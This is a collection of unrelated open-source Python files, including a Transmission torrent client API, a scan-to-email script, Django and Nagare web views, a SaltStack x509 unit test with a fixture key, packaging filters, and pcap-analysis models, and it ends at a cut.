ne if result.ratio: ratio = result.ratio mode = 0 if ratio: if float(ratio) == -1: ratio = 0 mode = 2 elif float(ratio) >= 0: ratio = float(ratio) mode = 1 # Stop seeding at seedRatioLimit arguments = {'ids': [result.hash], 'seedRatioLimit': ratio, 'seedRatioMode': mode } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _set_torrent_seed_time(self, result): if sickbeard.TORRENT_SEED_TIME and sickbeard.TORRENT_SEED_TIME != -1: time = int(60 * float(sickbeard.TORRENT_SEED_TIME)) arguments = {'ids': [result.hash], 'seedIdleLimit': time, 'seedIdleMode': 1 } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" else: return True def _set_torrent_priority(self, result): arguments = {'ids': [result.hash]} if result.priority == -1: arguments['priority-low'] = [] elif result.priority == 1: # set high priority for all files in torrent arguments['priority-high'] = [] # move torrent to the top if the queue arguments['queuePosition'] = 0 if sickbeard.TORRENT_HIGH_BANDWIDTH: arguments['bandwidthPriority'] = 1 else: arguments['priority-normal'] = [] post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" api = TransmissionAPI()
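The `_get_auth` dance above exists because Transmission's RPC rejects an unauthenticated request with HTTP 409 and hands back the session id to use; a minimal sketch of that handshake with plain requests (URL and credentials are placeholders):

import json
import requests

def transmission_call(url, method, arguments, auth=None):
    payload = json.dumps({'method': method, 'arguments': arguments})
    resp = requests.post(url, data=payload, auth=auth)
    if resp.status_code == 409:
        # the 409 response carries the session id the server expects back
        sid = resp.headers['X-Transmission-Session-Id']
        resp = requests.post(url, data=payload, auth=auth,
                             headers={'X-Transmission-Session-Id': sid})
    return resp.json()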
fcauwe/brother-scan
sendfile.py
Python
gpl-3.0
1,234
0.016207
#!/usr/bin/python import sys,os from email.Utils import COMMASPACE, formatdate from email.MIMEMultipart import MIMEMultipart from email.MIMEText import MIMEText from email.MIMEImage import MIMEImage from email.M
IMEBase import MIMEBase from email import Encoders import smtplib import XmlDict function=sys.
argv[1] user=sys.argv[2] filename=sys.argv[3] conf = XmlDict.loadXml("global.xml") for option in conf["menu"]["option"]: if ((option["type"].lower()==function.lower()) and (option["name"]==user)): option_selected = option msg = MIMEMultipart() msg['Subject'] = conf["subject"] msg['From'] = conf["source"] msg['To'] = COMMASPACE.join([option_selected["config"]]) msg['Date'] = formatdate(localtime=True) text = "Your scanner happily delivered this pdf to your mailbox.\n" msg.attach( MIMEText(text) ) part = MIMEBase('application', "pdf") part.set_payload( open(filename,"rb").read() ) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(filename) ) msg.attach(part) mailer = smtplib.SMTP(conf["smtp"]) #mailer.connect() mailer.sendmail(conf["source"],option_selected["config"] , msg.as_string()) mailer.close()
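For comparison, the same PDF-attachment mail built with the Python 3 email.message API, which replaces the MIMEMultipart/MIMEBase/Encoders combination used above; the function name, host, and addresses here are placeholders supplied by the caller:

import os
import smtplib
from email.message import EmailMessage

def send_pdf(smtp_host, source, dest, path):
    msg = EmailMessage()
    msg['Subject'] = 'Scanned document'
    msg['From'] = source
    msg['To'] = dest
    msg.set_content('Your scanner happily delivered this pdf to your mailbox.\n')
    with open(path, 'rb') as f:
        # attaches the file with base64 encoding and the right MIME headers
        msg.add_attachment(f.read(), maintype='application', subtype='pdf',
                           filename=os.path.basename(path))
    with smtplib.SMTP(smtp_host) as mailer:
        mailer.send_message(msg)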
Reigel/kansha
kansha/checklist/view.py
Python
bsd-3-clause
7,405
0.003106
#-- # Copyright (c) 2012-2014 Net-ng. # All rights reserved. # # This software is licensed under the BSD License, as described in # the file LICENSE.txt, which you should have received as part of # this distribution. #-- from nagare import presentation, security, var, ajax from nagare.i18n import _ from comp import NewChecklistItem, ChecklistTitle, ChecklistItemTitle, Checklists, Checklist, ChecklistItem @presentation.render_for(NewChecklistItem) def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(u'') with h.form(class_='new-item-form'): id_ = h.generate_id() h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Add item')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(text())) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) if self.focus: h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) self.focus = False return h.root @presentation.render_for(ChecklistTitle) def render_ChecklistTitle(self, h, comp, *args): """Render the title of the associated object""" h << h.i(class_='icon-list') kw = {} kw['style'] = 'cursor: pointer;display: inline;' kw['onclick'] = h.a.action(comp.answer).get('onclick').replace('return', "") with h.div(class_='text-title', **kw): content = self.text or h.span(_('Edit title'), class_='show_onhover') h << content return h.root @presentation.render_for(ChecklistTitle, model='edit') def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(self.text) with h.form(class_='title-form'): id_ = h.generate_id() h << h.i(class_='icon-list') h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text()))) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) return h.root @presentation.render_for(ChecklistItemTitle) def render_ChecklistTitle(self, h, comp, *args): """Render the title of the associated object""" return h.a(self.text).action(comp.answer) @presentation.render_for(ChecklistItemTitle, model='edit') def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(self.text) with h.form(class_='item-title-form'): id_ = h.generate_id() h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text()))) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) return h.root @presentation.render_for(Checklists, 'button') def render_Checklists_button(self, h, comp, model): if security.has_permissions('checklist', self.parent): with h.a(class_='btn').action(self.add_checklist): h << h.i(class_='ico
n-list') h << _('Checklist') return h.root @presentation.render_for(Checklists) def render_Checklists(self, h, comp, model): if security.has_permissions('checklist', se
lf.parent): # On drag and drop action = ajax.Update(action=self.reorder) action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h)) h.head.javascript(h.generate_id(), '''function reorder_checklists(data) { nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data)); }''' % ajax.py2js(action)) # On items drag and drop action = ajax.Update(action=self.reorder_items) action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h)) h.head.javascript(h.generate_id(), '''function reorder_checklists_items(data) { nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data)); }''' % ajax.py2js(action)) id_ = h.generate_id() with h.div(class_='checklists', id=id_): for index, clist in enumerate(self.checklists): h << clist.on_answer(lambda v, index=index: self.delete_checklist(index)) h << h.script("""$(function() { $("#" + %(id)s).sortable({ placeholder: "ui-state-highlight", axis: "y", handle: ".icon-list", cursor: "move", stop: function( event, ui ) { reorder_checklists($('.checklist').map(function() { return this.id }).get()) } }); $(".checklists .checklist .content ul").sortable({ placeholder: "ui-state-highlight", cursor: "move", connectWith: ".checklists .checklist .content ul", dropOnEmpty: true, update: function(event, ui) { var data = { target: ui.item.closest('.checklist').attr('id'), index: ui.item.index(), id: ui.item.attr('id') } reorder_checklists_items(data); } }).disableSelection(); })""" % {'id': ajax.py2js(id_)}) return h.root @presentation.render_for(Checklists, 'badge') def render_Checklists_badge(self, h, comp, model): if self.checklists: h << h.span(h.i(class_='icon-list'), ' ', self.nb_items, u' / ', self.total_items, class_='label') return h.root @presentation.render_for(Checklist) def render_Checklist(self, h, comp, model): with h.div(id='checklist_%s' % self.id, class_='checklist'): with h.div(class_='title'): h << self.title if self.title.model != 'edit': h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete') with h.div(class_='content'): if self.items: h << comp.render(h, 'progress') with h.ul: for index, item in enumerate(self.items): h << h.li(item.on_answer(lambda v, index=index: self.delete_item(index)), id='checklist_item_%s' % item().id) h << self.new_item return h.root @presentation.render_for(Checklist, 'progress') def render_Checklist_progress(self, h, comp, model): progress = self.progress with h.div(class_='progress progress-success'): h << h.div(class_='bar', style='width:%s%%' % progress) h << h.span(progress, u'%', class_='percent') return h.root @presentation.render_for(ChecklistItem) def render_ChecklistItem(self, h, comp, model): h << h.a(h.i(class_='icon-checkbox-' + ('checked' if self.done else 'unchecked'))).action(self.set_done) h << h.span(self.title, class_='done' if self.done else '') if not self.title.model == 'edit': h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete') return h.root
saltstack/salt
tests/unit/states/test_x509.py
Python
apache-2.0
5,661
0
import tempfile import salt.utils.files from salt.modules import x509 as x509_mod from salt.states import x509 from tests.support.helpers import dedent from tests.support.mixins import LoaderModuleMockMixin from tests.support.mock import MagicMock from tests.support.unit import TestCase, skipIf try: import M2Crypto # pylint: disable=unused-import HAS_M2CRYPTO = True except ImportError: HAS_M2CRYPTO = False class X509TestCase(TestCase, LoaderModuleMockMixin): def setup_loader_modules(self): return {x509: {"__opts__": {"fips_mode": False}}} def test_certificate_info_matches(self): cert_info = {"MD5 Finger Print": ""} required_info = {"MD5 Finger Print": ""} ret = x509._certificate_info_matches(cert_info, required_info) assert ret == (True, []) class X509FipsTestCase(TestCase, LoaderModuleMockMixin): def setup_loader_modules(self): self.file_managed_mock = MagicMock() self.file_man
aged_mock.return_value = {"changes": True} return { x509: { "__opts__": {"fips_mode": True}, "__salt__": { "x509.get_pem_entry": x509_mod.get_pem_entry, "x509.get_private_key_size": x509_mod.get_private_key_size, },
"__states__": {"file.managed": self.file_managed_mock}, } } @skipIf(not HAS_M2CRYPTO, "Skipping, M2Crypto is unavailable") def test_private_key_fips_mode(self): """ :return: """ test_key = dedent( """ -----BEGIN PRIVATE KEY----- MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDx7UUt0cPi5G51 FmRBhAZtZb5x6P0PFn7GwnLmSvLNhCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66O GOFmWBg06v8+sqUbaF9PZ/CxQD5MogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzg Tr/mXp2ohVAb6ihjqb7XV9MiZaLNVX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX 1twLlyDja+uDbCMZ4jDNB+wsWxTaPRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+ G/DX2hwb/ZAM9B1SXTfZ3gzaIIbqXBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9 Mit7RIBxAgMBAAECggEAD4Pi+uRIBsYVm2a7OURpURzEUPPbPtt3d/HCgqht1+ZR CJUEVK+X+wcm4Cnb9kZpL7LeMBfhtfdz/2LzGagurT4g7nlwg0h3TFVjJ0ryc+G0 cVNOsKKXPzKE5AkPH7kNw04V9Cl9Vpx+U6hZQEHzJHqgP5oNyw540cCtJriT700b fG1q3PYKWSkDwTiUnJTnVLybFIKQC6urxTeT2UWeiBadfDY7DjI4USfrQsqCfGMO uWPpOOJk5RIvw5r0Of2xvxV76xCgzVTkgtWjBRMTEkfeYx3019xKlQtAKoGbZd1T tF8DH0cDlnri4nG7YT8yYvx/LWVDg12E6IZij1X60QKBgQD7062JuQGEmTd99a7o 5TcgWYqDrmE9AEgJZjN+gnEPcsxc50HJaTQgrkV0oKrS8CMbStIymbzMKWifOj7o gvQBVecydq1AaXePt3gRe8vBFiP4cHjFcSegs9FDvdfJR36iHOBIgEp4DWvV1vgs +z82LT6Qy5kxUQvnlQ4dEaGdrQKBgQD175f0H4enRJ3BoWTrqt2mTAwtJcPsKmGD 9YfFB3H4+O2rEKP4FpBO5PFXZ0dqm54hDtxqyC/lSXorFCUjVUBero1ECGt6Gnn2 TSnhgk0VMxvhnc0GReIt4K9WrXGd0CMUDwIhFHj8kbb1X1yqt2hwyw7b10xFVStl sGv8CQB+VQKBgAF9q1VZZwzl61Ivli2CzeS/IvbMnX7C9ao4lK13EDxLLbKPG/CZ UtmurnKWUOyWx15t/viVuGxtAlWO/rhZriAj5g6CbVwoQ7DyIR/ZX8dw3h2mbNCe buGgruh7wz9J0RIcoadMOySiz7SgZS++/QzRD8HDstB77loco8zAQfixAoGBALDO FbTocfKbjrpkmBQg24YxR9OxQb/n3AEtI/VO2+38r4h6xxaUyhwd1S9bzWjkBXOI poeR8XTqNQ0BR422PTeUT3SohPPcUu/yG3jG3zmta47wjjPDS85lqEgtGvA0cPN7 srErcatJ6nlOnGUSw9/K65y6lFeH2lIZ2hfwNM2dAoGBAMVCc7i3AIhLp6UrGzjP 0ioCHCakpxfl8s1VQp55lhHlP6Y4RfqT72Zq7ScteTrisIAQyI9ot0gsuct2miQM nyDdyKGki/MPduGTzzWlBA7GZEHnxbAILH8kWJ7eE/Nh7zdF1CRts8utEO9L9S+0 lVz1j/xGOseQk4cVos681Wpw -----END PRIVATE KEY-----""" ) test_cert = dedent( """ -----BEGIN CERTIFICATE----- MIIDazCCAlOgAwIBAgIUAfATs1aodKw11Varh55msmU0LoowDQYJKoZIhvcNAQEL BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTAzMjMwMTM4MzdaFw0yMjAz MjMwMTM4MzdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB AQUAA4IBDwAwggEKAoIBAQDx7UUt0cPi5G51FmRBhAZtZb5x6P0PFn7GwnLmSvLN hCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66OGOFmWBg06v8+sqUbaF9PZ/CxQD5M ogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzgTr/mXp2ohVAb6ihjqb7XV9MiZaLN VX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX1twLlyDja+uDbCMZ4jDNB+wsWxTa PRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+G/DX2hwb/ZAM9B1SXTfZ3gzaIIbq XBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9Mit7RIBxAgMBAAGjUzBRMB0GA1Ud DgQWBBT0qx4KLhozvuWAI9peT/utYV9FITAfBgNVHSMEGDAWgBT0qx4KLhozvuWA I9peT/utYV9FITAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQDx tWvUyGfEwJJg1ViBa10nVhg5sEc6KfqcPzc2GvatIGJlAbc3b1AYu6677X04SQNA dYRA2jcZcKudy6eolPJow6SDpkt66IqciZYdbQE5h9elnwpZxmXlJTQTB9cEwyIk 2em5DKpdIwa9rRDlbAjAVJb3015MtpKRu2gsQ7gl5X2U3K+DFsWtBPf+0xiJqUiq rd7tiHF/zylubSyH/LVONJZ6+/oT/qzJfxfpvygtQWcu4b2zzME/FPenMA8W6Rau ZYycQfpMVc7KwqF5/wfjnkmfxoFKnkD7WQ3qFCJ/xULk/Yn1hrvNeIr+khX3qKQi Y3BMA5m+J+PZrNy7EQSa -----END CERTIFICATE----- """ ) fp, name = tempfile.mkstemp() with salt.utils.files.fopen(name, "w") as fd: fd.write(test_key) fd.write(test_cert) ret = x509.private_key_managed(name) self.file_managed_mock.assert_called_once() assert ( self.file_managed_mock.call_args.kwargs["contents"].strip() == test_key.strip() ) def test_certificate_info_matches(self): cert_info = {"MD5 Finger Print": ""} 
required_info = {"MD5 Finger Print": ""} ret = x509._certificate_info_matches(cert_info, required_info) assert ret == (False, ["MD5 Finger Print"])
ActiveState/code
recipes/Python/578947_Validate_product/recipe-578947.py
Python
mit
281
0.017794
import re print " Write product name : " nume_produs = raw_input() print
" Write product price : " cost_produs = input() if (nume_produs == re.sub('[^a-z]',"",nume_produs)): print ('%s %d'%(nume_produs,cost_produs)) else: print "Error
! You must type letters" input()
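The recipe validates by comparing the input against a copy stripped of everything outside a-z; `re.fullmatch` (a Python 3 sketch) states the same check directly:

import re

def is_valid_name(name):
    # accept only non-empty strings made entirely of lowercase letters
    return re.fullmatch('[a-z]+', name) is not None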
evernym/zeno
plenum/test/buy_handler.py
Python
apache-2.0
1,707
0.001172
from _sha256 import sha256 from typing import Optional from common.serializers.serialization import domain_state_serializer from plenum.common.constants import DOMAIN_LEDGER_ID from plenum.common.request import Request from plenum.common.txn_util import get_payload_data, get_from, get_req_id from plenum.server.database_manager import DatabaseManager from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler from plenum.test.constants import BUY from stp_core.common.log import getlogger logger = getlogger() class BuyHandler(WriteRequestHandler): def __init__(self, database_manager: DatabaseManag
er): super().__init__(database_manager, BUY, DOMAIN_LEDGER_ID) def static_validation(self, request: Request): self._validate_request_type(request) def dynamic_validation(self, request: Request, req_pp_time: Optional[int]): self._validate_request_type(request) def update_
state(self, txn, prev_result, request, is_committed=False): self._validate_txn_type(txn) key = self.gen_state_key(txn) value = domain_state_serializer.serialize({"amount": get_payload_data(txn)['amount']}) self.state.set(key, value) logger.trace('{} after adding to state, headhash is {}'. format(self, self.state.headHash)) def gen_state_key(self, txn): identifier = get_from(txn) req_id = get_req_id(txn) return self.prepare_buy_key(identifier, req_id) @staticmethod def prepare_buy_key(identifier, req_id): return sha256('{}{}:buy'.format(identifier, req_id).encode()).digest() def __repr__(self): return "TestHandler"
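Because `prepare_buy_key` is a pure function of the identifier and request id, the state slot for a buy can be recomputed anywhere; a quick illustration with made-up values:

from hashlib import sha256

def prepare_buy_key(identifier, req_id):
    return sha256('{}{}:buy'.format(identifier, req_id).encode()).digest()

# same inputs always land in the same state slot; a different req_id lands elsewhere
assert prepare_buy_key('V4SGRU86Z58d6TV7PBUe6f', 1) == prepare_buy_key('V4SGRU86Z58d6TV7PBUe6f', 1)
assert prepare_buy_key('V4SGRU86Z58d6TV7PBUe6f', 1) != prepare_buy_key('V4SGRU86Z58d6TV7PBUe6f', 2)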
toontownfunserver/Panda3D-1.9.0
direct/pyinst/tocfilter.py
Python
bsd-3-clause
4,386
0.007068
import os import finder import re import sys def makefilter(name, xtrapath=None): typ, nm, fullname = finder.identify(name, xtrapath) if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE): return ModFilter([os.path.splitext(nm)[0]]) if typ == finder.PACKAGE: return PkgFilter([fullname]) if typ == finder.DIRECTORY: return DirFilter([fullname]) if typ in (finder.BINARY, finder.PBINARY): return FileFilter([nm]) return FileFilter([fullname]) class _Filter: def __repr__(self): return '<'+self.__class__.__name__+' '+repr(self.elements)+'>' class _NameFilter(_Filter): """ A filter mixin that matches (exactly) on name """ def matches(self, res): return self.elements.get(res.name, 0) class _PathFilter(_Filter): """ A filter mixin that matches if the resource is below any of the paths""" def matches(self, res): p = os.path.normcase(os.path.abspath(res.path)) while len(p) > 3: p = os.path.dirname(p) if self.elements.get(p, 0): return 1 return 0 class _ExtFilter(_Filter): """ A filter mixin that matches based on file extensions (either way) """ include = 0 def matches(self, res): fnd = self.elements.get(os.path.splitext(res.path)[1], 0) if self.include: return not fnd return fnd class _TypeFilter(_Filter): """ A filter mixin that matches on resource type (either way) """ include = 0 def matches(self, res): fnd = self.elements.get(res.typ, 0) if self.include: return not fnd return fnd class _PatternFilter(_Filter): """ A filter that matches if re.search succeeds on the resource path """ def matches(self, res): for regex in self.elements: if regex.search(res.path): return 1 return 0 class ExtFilter(_ExtFilter): """ A file extension filter. ExtFilter(extlist, include=0) where extlist is a list of file extensions """ def __init__(self, extlist, include=0): self.elements = {} for ext in extlist: if ext[0:1] != '.': ext = '.'+ext self.elements[ext] = 1 self.include = include class TypeFilter(_TypeFilter): """ A filter for resource types. TypeFilter(typlist, include=0) where typlist is a subset of ['a','b','d','m','p','s','x','z'] """ def __init__(self, typlist, include=0): self.elements = {} for typ in typlist: self.elements[typ] = 1 self.include = include class FileFilter(_NameFilter): """ A filter for data files """ def __init__(sel
f, filelist): self.elements = {} for f in filelist: self.elements[f] = 1 class ModFilter(_NameFilter): """ A filter for Python modules. ModFilter(modlist) where modlist is eg ['macpath', 'dospath'] """ def __init__(self, modlist): self.elements = {} for mod in modlist:
self.elements[mod] = 1 class DirFilter(_PathFilter): """ A filter based on directories. DirFilter(dirlist) dirs may be relative and will be normalized. Subdirectories of dirs will be excluded. """ def __init__(self, dirlist): self.elements = {} for pth in dirlist: pth = os.path.normcase(os.path.abspath(pth)) self.elements[pth] = 1 class PkgFilter(_PathFilter): """At this time, identical to a DirFilter (being lazy) """ def __init__(self, pkglist): #warning - pkgs are expected to be full directories self.elements = {} for pkg in pkglist: pth = os.path.normcase(os.path.abspath(pkg)) self.elements[pth] = 1 class StdLibFilter(_PathFilter): """ A filter that excludes anything found in the standard library """ def __init__(self): pth = os.path.normcase(os.path.join(sys.exec_prefix, 'lib')) self.elements = {pth:1} class PatternFilter(_PatternFilter): """ A filter that excludes if any pattern is found in resource's path """ def __init__(self, patterns): self.elements = [] for pat in patterns: self.elements.append(re.compile(pat))
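A sketch of how these filters compose over a table of contents; `Resource` is a stand-in with the three attributes (`name`, `path`, `typ`) that the `matches()` implementations read:

from collections import namedtuple

Resource = namedtuple('Resource', 'name path typ')

exclude = [ExtFilter(['pyc', 'pyo']), TypeFilter(['b'])]
toc = [Resource('macpath', '/lib/macpath.pyc', 'm'),   # dropped by ExtFilter
       Resource('zlib', '/lib/zlib.so', 'b'),          # dropped by TypeFilter
       Resource('readme', '/docs/readme.txt', 'x')]    # kept
kept = [res for res in toc if not any(f.matches(res) for f in exclude)]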
kermitfr/kermit-webui
src/webui/progress/views.py
Python
gpl-3.0
1,766
0.007361
''' Created on Nov 17, 2011 @author: mmornati ''' from django.http import HttpResponse from django.utils import simplejson as json import logging from celery.result import AsyncResult from webui.restserver.template import render_agent_template import sys logger = logging.getLogger(__name__) def get_progress(request, taskname, taski
d): logger.info("Requesting taskid: %s"%taskid) result = AsyncResult(taskid, backend=None, task_name=taskname) logger.info("TASKID: %s"%result.task_id) dict = {} if (result.state == 'PENDING'): dict
['state'] = 'Waiting for worker to execute task...' elif (result.state == 'PROGRESS'): dict['state'] = 'Operation in progress..' else: dict['state'] = result.state backend_response = None try: backend_response = result.result except: logger.warn(sys.exc_info()) if backend_response: if isinstance(result.result, tuple): response,content,agent,action=result.result if response.status == 200: json_data = render_agent_template(request, {}, content, {}, agent, action) return HttpResponse(json_data, mimetype="application/json") elif response.status == 408: dict['state'] = 'FAILURE' dict['message'] = 'TIMEOUT' else: if "current" in result.result and "total" in result.result: value = float(1.0*result.result['current']/result.result['total'])*100 dict['value'] = value else: dict.update({"responsecontent": result.result}) else: dict['value'] = 0 json_data = json.dumps(dict) return HttpResponse(json_data, mimetype="application/json")
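The view expects workers to publish `current` and `total` while in the PROGRESS state; with a modern Celery API (`shared_task` with `bind=True` is assumed here, and the task body is hypothetical) the producing side looks roughly like:

from celery import shared_task

@shared_task(bind=True)
def long_job(self, items):
    for i, item in enumerate(items):
        # ... process item ...
        self.update_state(state='PROGRESS',
                          meta={'current': i + 1, 'total': len(items)})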
oguzy/ovizart
ovizart/pcap/models.py
Python
gpl-3.0
5,743
0.003657
from django.db import models from djangotoolbox.fields import EmbeddedModelField, ListField from django_mongodb_engine.contrib import MongoDBManager import os # Create your models here. # save the created json file name path # only one file for summary should be kept here class UserJSonFile(models.Model): user_id = models.CharField(max_length=100) json_type = models.CharField(max_length=10) # possible value is summary for the summary view json_file_name = models.CharField(max_length=100) # save the name of the already created file name on disk class Flow(models.Model): user_id = models.CharField(max_length=100) hash_value = models.CharField(max_length=50) file_name = models.CharField(max_length=50) upload_time = models.DateTimeField() file_type = models.CharField(max_length=150) file_size = models.IntegerField() path = models.FilePathField() pcaps = ListField(EmbeddedModelField('Pcap', null=True, blank=True)) details = ListField(EmbeddedModelField('FlowDetails', null=True, blank=True)) def __unicode__(self): return u'%s/%s' % (self.path, self.file_name) def get_upload_path(self): hash_dir = os.path.basename(self.path) root = os.path.basename(os.path.dirname(self.path)) return os.path.join(root, hash_dir) class Pcap(models.Model): hash_value = models.CharField(max_length=100) file_name = models.FileField(upload_to="uploads", null=True, blank=True) path = models.FilePathField() packets = ListField(EmbeddedModelField('PacketDetails', null=True, blank=True)) def __unicode__(self): return u'%s/%s' % (self.path, self.file_name) def get_upload_path(self): hash_dir = os.path.basename(self.path) root = os.path.basename(os.path.dirname(self.path)) return os.path.join(root, hash_dir) # there should be also a table of fields that kepts the traffic bytes related with communication class PacketDetails(models.Model): #datetime.datetime.fromtimestamp(float("1286715787.71")).strftime('%Y-%m-%d %H:%M:%S') ident = models.IntegerField() flow_hash = models.CharField(max_length=50) timestamp = models.DateTimeField() length = models.IntegerField() protocol = models.IntegerField() src_ip = models.IPAddressField() dst_ip = models.IPAddressField() sport = models.IntegerField() dport = models.IntegerField() data = models.TextField(null=True, blank=True) def __unicode__(self): return u'(%s, %s, %s, %s, %s)' % (self.protocol, self.src_ip, self.sport, self.dst_ip, self.dport) objects = MongoDBManager() # save the ips at the applayerproto.log (http.log for ex) class FlowDetails(models.Model): parent_hash_value = models.CharField(max_length=50) user_id = models.CharField(max_length=100) src_ip = models.IPAddressField() dst_ip = models.IPAddressField() sport = models.IntegerField() dport = models.IntegerField() protocol = models.CharField(max_length=10) timestamp = models.DateTimeField() objects = MongoDBManager() class HTTPDetails(models.Model): # request or response http_type = models.CharField(max_length=10) # request fields method = models.CharField(max_length=5, null=True, blank=True) uri = models.URLField(null=True, blank=True) headers = models.TextField(null=True, blank=True) version = models.FloatField(null=True, blank=True) # request part ends # response fields # header and version is here also reason = models.CharField(max_length="5", null=True, blank=True) status = models.IntegerField(null=True, blank=True) # i might need body body = models.TextField(null=True, blank=True) content_type = models.CharField(max_length=25, null=True, blank=True) content_encoding = models.CharField(max_length=25, null=True, 
blank=True) # response ends # i might need files also files = ListField(null=True, blank=True) file_path = models.CharField(max_length=200, null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) # for raw queries, filtering according to flow_details will be possible objects = MongoDBManager() class DNSRequest(models.Model): type = models.IntegerField() human_readable_type = models.CharField(max_length=50) value = models.CharField(max_length=50, null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() class DNSResponse(models.Model): type = models.IntegerField() human_readable_type = models.CharField(max_length=50) value = ListField(null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() class SMTPDetails(models.Model): login_data = ListField(null=True, blank=True) msg_from = models.CharField(max_length=100, null=True, blank=True) rcpt_to = models.CharField(max_length=100, null=True, blank=True) raw = models.TextField(null=True, blank=True) msgdata = models.TextField(null=True, blank=True) attachment_path = ListField(null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() def get_path_dict(self): #/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh result = [] f
or path in self.attachment_path: tmp = dict() r = path.split("uploads") file_name = os.path.basename(r[1]) tmp['file_name'] = file_nam
e tmp['path'] = r[1] result.append(tmp) return result
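What `get_path_dict` produces for one stored attachment path is plain string handling, so it can be checked without a database; using the sample path from the comment above:

import os

path = '/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh'
rel = path.split('uploads')[1]
entry = {'file_name': os.path.basename(rel), 'path': rel}
# entry['file_name'] == 'part-001.ksh'; entry['path'] starts at '/16-06-12/...'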
DigitalCampus/django-oppia
tests/oppia/test_context_processors.py
Python
gpl-3.0
2,547
0
from django.urls import reverse from oppia.test import OppiaTestCase from reports.models import DashboardAccessLog class ContextProcessorTest(OppiaTestCase): fixtures = ['tests/test_user.json', 'tests/test_oppia.json', 'tests/test_quiz.json', 'tests/test_permissions.json', 'tests/test_course_permissions.json', 'tests/test_question_indices.json', 'tests/awards/award-course.json', 'tests/test_certificatetemplate.json'] # home page not logged in def test_get_home_not_logged_in(self): dal_start_count = DashboardAccessLog.objects.all().count() self.client.get(reverse('oppia:index')) dal_end_count = DashboardAccessLog.objects.all().count() # shouldn't add a log for non logged in users self.assertEqual(dal_start_count, dal_end_count) # home page - all users - get def test_get_home_logged_in(self): for user in (self.admin_user, self.normal_user, self.teacher_user, self.staff_user): self.client.force_login(user=user) dal_start_count = DashboardAccessLog.objects.all().count() self.client.get(reverse('oppia:inde
x'), follow=True) dal_end_count = DashboardAccessLog.objects.all().count()
self.assertEqual(dal_start_count+1, dal_end_count) # home page - all users - post def test_post_home_logged_in(self): for user in (self.admin_user, self.normal_user, self.teacher_user, self.staff_user): self.client.force_login(user=user) dal_start_count = DashboardAccessLog.objects.all().count() self.client.post(reverse('oppia:index'), follow=True, data={'test': 'mytest'}) dal_end_count = DashboardAccessLog.objects.all().count() self.assertEqual(dal_start_count+1, dal_end_count) # admin pages get def test_get_admin(self): dal_start_count = DashboardAccessLog.objects.all().count() self.client.force_login(user=self.admin_user) self.client.get(reverse('admin:oppia_course_changelist')) dal_end_count = DashboardAccessLog.objects.all().count() # shouldn't add a log for admin self.assertEqual(dal_start_count, dal_end_count) # admin pages post # api pages # sensitive info
tmtowtdi/MontyLacuna
